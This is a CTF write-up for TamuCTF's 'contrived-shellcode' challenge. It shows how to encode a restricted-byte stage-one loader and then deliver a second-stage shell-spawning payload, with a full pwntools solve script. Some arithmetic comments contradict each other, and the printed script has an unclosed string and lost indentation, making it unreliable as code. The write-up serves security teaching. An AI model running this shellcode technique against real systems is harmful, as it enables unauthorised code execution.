Tags: shellcode pwn 


# Contrived Shellcode

This shellcode challenge was one of the *hard pwn* problems from [TamuCTF](https://tamuctf.com/challenges). TamuCTF is a great CTF, where [our team](https://research.fit.edu/fitsec) went all in and cleared a lot of the ``pwn`` problems. I started the second day and had to start with this harder problem. The author leaves a fun note about the problem.

## Problem

*There's a 0% chance this has any real world application, but sometimes it's just fun to test your skills.*

Further, the author provides a [binary](chttps://github.com/tj-oconnor/ctf-writeups/blob/main/tamu_ctf_23/contrived-shellcode/contrived-shellcode) and the original [source code](https://github.com/tj-oconnor/ctf-writeups/blob/main/tamu_ctf_23/contrived-shellcode/contrived-shellcode.c) for the challenge.

## Solution

Examining the source code, we see it is a shellcode challenge where you are restricted to only the following bytes:

unsigned char whitelist[] = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f";

This is similar to the [gelcode-2 problem](https://ctftime.org/writeup/29138) from RedPwnCTF 21 (which was limited to only bytes 01-05.) Inspired by [lms](https://ctftime.org/user/52568)'s solution to that particular problem, I took a similar approach that ``adds`` a value into ``eax`` and inserts it as the following instruction by adding eax to ``[rip]`` (which is zeroed to 0x0000000000000000.)

To illustrate how this works, let us examine the ``pop rsi`` instruction. For ``pop rsi``, we need to ``add eax`` up to ``0x5e``. However, we cant use ``add eax, 0x5e`` since ``0x5e`` is not in our whitelist. For that reason, we need to use multiple adds ``0xf+0xf+0xf+0xf+0xf+0xf+0x4``.

rsi_pop = asm('add al, 0xf')*6
rsi_pop += asm('add al, 0x4')
rsi_pop += asm('add dword ptr [rip], eax')

We can test this methodology to see if this works in the debugger output. where we see ```pop rsi``` appear after executing ``add dword ptr [rip], eax``.

─────────────────────────[ DISASM / x86-64 /
0x7f2d4dd61000 add al, 0xf
0x7f2d4dd61002 add al, 0xf
0x7f2d4dd61004 add al, 0xf
0x7f2d4dd61006 add al, 0xf
0x7f2d4dd61008 add al, 0xf
0x7f2d4dd6100a add al, 0xf
0x7f2d4dd6100c add al, 4
0x7f2d4dd6100e add dword ptr [rip], eax
► 0x7f2d4dd61014 pop rsi

With this approach working, we'll need to develop our shellcode for this problem. Reading in a second stage shellcode would be the best approach since the buffer allocates ``0x1000`` bytes of ``RWX`` memory. We can just read in a second-stage shellcode that is not bound by the original whitelist.

unsigned char* code = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

To create our stage1 ``read shellcode``, we will need to set the registers to the following:

- rax: 0 (SYS_read)
- rdi: 0 (stdin)
- rsi: address of RWX memory
- rdx: large enough value to write new shellcode (past RWX up into current instruction)

Examining the state of the stack, it appears that if we ``pop rsi`` three times, the third pop will pick up the address of the RWX memory.

│pwndbg> stack
│00:0000│ rsp 0x7fffb1516a98 —▸ 0x560566b23295 (main+155) ◂— mov eax, 0
│01:0008│ 0x7fffb1516aa0 ◂— 0xf700000000
│02:0010│ 0x7fffb1516aa8 —▸ 0x7f2d4dd61000 ◂— add al, 0xf /* 0xf040f040f040f04 */

With this knowledge, our basic shellcode might look like the following.

mov rdx, 0x1fb /* length */
pop rsi
pop rsi
pop rsi /* RWX memory &/
mov rdi, 0x0 /* stdin */
mov rax, 0x0 /* SYS_read */
syscall /* executes read(rdi=stdin, rsi=RWX, rdx=200) */

What we need to do next is to order these by the value of the assembly instructions. For example, ``pop rsi`` is ``0x5e`` and ``mov rdi`` is ``0xbf``. So we will need to add eax up to ``0x5e (pop rsi)``, insert the instruction at [rip], then add eax by ``(0xbf-0x5e)`` to get ``eax=0xbf (mov rdi)`` and insert the instruction. Note, the binary only accepts 0x100 bytes of shellcode. So choosing the right instructions and order is important (and where I spent most of my time refining a solution.) At one point, I [patched the binary](https://github.com/tj-oconnor/ctf-writeups/blob/main/tamu_ctf_23/contrived-shellcode/contrived-shellcode-patch) to accept 0x200 bytes so that I could test my approach. Seeing it succeed on the patched binary gave me the final push to work through and reduce the shellcode size to 233 bytes. The final order I developed was:

pop rsi (0x5e) /* pop 1st stack value */
pop rsi (0x5e) /* pop 2nd stack value */
pop rsi (0x5e) /* sets rsi = RWX. */
mov rdi, 0x0 (0xbf) /* rdi = 0x0 (stdin) */
mov rdx, 0x1fb (0x1fbba) /* rdx = 0x1fb (len) */
sub rax, rax (0xc02948) /* rax = 0x0 (SYS_read) */

Let us examine how we set the registers.

As previously mentioned, we can set rsi by adding ``0xf*6+0x4``. And then, repeat the instruction write two more times. Notice we had to pad ``\x00`` between instructions to prevent unintended instructions.

def pop_rsi():
# pop rsi = 0x5e
# 0x5e = 0xf*6+0x4
rsi_pop = asm('add al, 0xf')*6
rsi_pop += asm('add al, 0x4')
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
log.info('> (pop rsi)*3 shellcode : (%i bytes)' % len(rsi_pop))
return rsi_pop

Next, we write ``mov rdi, 0x0`` by starting at ``eax=0x5e`` and adding up ``0x5e+0xf*6+0x7==0xbf``.

def zero_edi():
# mov rdi = 0xbf
# (0xbf=0xba+0x5)
edi_zero = asm('add al, 0xf')*6
edi_zero += asm('add al, 0x7')
edi_zero += asm('add dword ptr [rip], eax')
edi_zero += b'\x00'*5
log.info('> (mov edi, 0x0) shellcode : (%i bytes)' % len(edi_zero))
return edi_zero

We then repeat for ``mov edx, 0x1fb (0x1fbba)`` by adding up eax``01fbba=0xbf+0xf0e0f+0xf*15+0xb``

def big_edx():
# 0: ba fb 01 00 00 mov edx, 0x1fb'
# (0x0f0fba=0xbf+0xf0e0f+0xf*15+0xb)
edx_big = asm('add eax, 0xf0e0f')
edx_big += asm('add al,0xf')*15
edx_big += asm('add al, 0xb')
edx_big += asm('add dword ptr [rip], eax')
edx_big += b'\x00'*5
log.info('> (mov edx, 0x1fb) shellcode : (%i bytes)' % len(edx_big))
return edx_big

And finally we zero out rax with ``sub rax, rax (0xc02948)`` by adding ``0xc02948=0x01fbba+0xf0f0f*11+0xb0f0f+0x0f0f*6+0x90f+0x30f+0xf*6+8``

def zero_rax():
# sub rax, rax
# 0: 48 29 c0 sub rax, rax'
# 0xc02948-0x0f0fba-0xf0f0f*11-0xb0f0f-0x0f0f*6-0x90f-0x10f-0xf*6+8
rax_zero = asm('add eax,0x0f0f0f')*11
rax_zero += asm('add eax,0xb0f0f')
rax_zero += asm('add eax, 0x0f0f')*6
rax_zero += asm('add eax, 0x90f')
rax_zero += asm('add eax, 0x30f')
rax_zero += asm('add al, 0x0f')*6
rax_zero += asm('add al, 0x8')
rax_zero += asm('add dword ptr [rip], eax')
rax_zero += b'\x00'*3
log.info('> sub (rax, rax) shellcode : (%i bytes)' % len(rax_zero))
return rax_zero

The only thing we need to do next is to send our stage1 shellcode and then read our stage2 shellcode. Note, our second stage starts writing at the beginning our the stage1 shellcode, so we'll need to ``nop`` out the beginning until we reach the next instruction to execute. For this reason, we pad the front of our second stage with ``stage2 = asm(shellcraft.nop())*(len(stage1)+0x8*5)``

log.info('Building Stage1 Shellcode.')
stage1 = pop_rsi()
stage1 += zero_edi()
stage1 += big_edx()
stage1 += zero_rax()
stage1 += asm('syscall')

log.info('Throwing Stage 1 Shellcode (%i bytes)' % len(stage1))

stage2 = asm(shellcraft.nop())*(len(stage1)+0x8*5)
stage2 += asm(shellcraft.sh())
log.info('Throwing Stage 2 Shellcode (%i bytes)' % len(stage2))


Testing our script against the remote server, we are excited to see it works and get the flag.

[+] Opening connection to tamuctf.com on port 443: Done
[*] Building Stage1 Shellcode.
[*] > (pop rsi)*3 shellcode : (35 bytes)
[*] > (mov edi, 0x0) shellcode : (25 bytes)
[*] > (mov edx, 0x1fb) shellcode : (48 bytes)
[*] > (sub rax, rax) shellcode : (123 bytes)
[*] Throwing Stage 1 Shellcode (233 bytes)
[*] Paused (press any to continue)
[*] Throwing Stage 2 Shellcode (321 bytes)
[*] Switching to interactive mode
$ cat flag.txt

Our final solve script follows:

from pwn import *

binary = args.BIN

context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary, checksec=False)

gs = '''
break *$rebase(0x1293)

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote("tamuctf.com", 443, ssl=True, sni="contrived-shellcode")
return process(e.path)

p = start()

def pop_rsi():
# pop rsi = 0x5e
# 0x5e = 0xf*6+0x4
rsi_pop = asm('add al, 0xf')*6
rsi_pop += asm('add al, 0x4')
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
rsi_pop += asm('add dword ptr [rip], eax')
rsi_pop += b'\x00'*1
log.info('> (pop rsi)*3 shellcode : (%i bytes)' % len(rsi_pop))
return rsi_pop

def zero_edi():
# mov rdi = 0xbf
# (0xbf=0xba+0x5)
edi_zero = asm('add al, 0xf')*6
edi_zero += asm('add al, 0x7')
edi_zero += asm('add dword ptr [rip], eax')
edi_zero += b'\x00'*5
log.info('> (mov edi, 0x0) shellcode : (%i bytes)' % len(edi_zero))
return edi_zero

def big_edx():
# 0: ba fb 01 00 00 mov edx, 0x1fb'
# (0x1fbfba=0xbf+0xf0e0f+0xf*15+0xb)
edx_big = asm('add eax, 0xf0e0f')
edx_big += asm('add al,0xf')*15
edx_big += asm('add al, 0xb')
edx_big += asm('add dword ptr [rip], eax')
edx_big += b'\x00'*5
log.info('> (mov edx, 0x1fb) shellcode : (%i bytes)' % len(edx_big))
return edx_big

def zero_rax():
# sub rax, rax
# 0: 48 29 c0 sub rax, rax'
# 0xc02948=0x1fbba+0xf0f0f*11+0xb0f0f+0x0f0f*6+0x90f+0x30f+0xf*6+8
rax_zero = asm('add eax,0x0f0f0f')*11
rax_zero += asm('add eax,0xb0f0f')
rax_zero += asm('add eax, 0x0f0f')*6
rax_zero += asm('add eax, 0x90f')
rax_zero += asm('add eax, 0x30f')
rax_zero += asm('add al, 0x0f')*6
rax_zero += asm('add al, 0x8')
rax_zero += asm('add dword ptr [rip], eax')
rax_zero += b'\x00'*3
log.info('> (sub rax, rax) shellcode : (%i bytes)' % len(rax_zero))
return rax_zero

log.info('Building Stage1 Shellcode.')
stage1 = pop_rsi()
stage1 += zero_edi()
stage1 += big_edx()
stage1 += zero_rax()
stage1 += asm('syscall')

log.info('Throwing Stage 1 Shellcode (%i bytes)' % len(stage1))

stage2 = asm(shellcraft.nop())*(len(stage1)+0x8*5)
stage2 += asm(shellcraft.sh())
log.info('Throwing Stage 2 Shellcode (%i bytes)' % len(stage2))


Original writeup (https://github.com/tj-oconnor/ctf-writeups/tree/main/tamu_ctf_23/contrived-shellcode).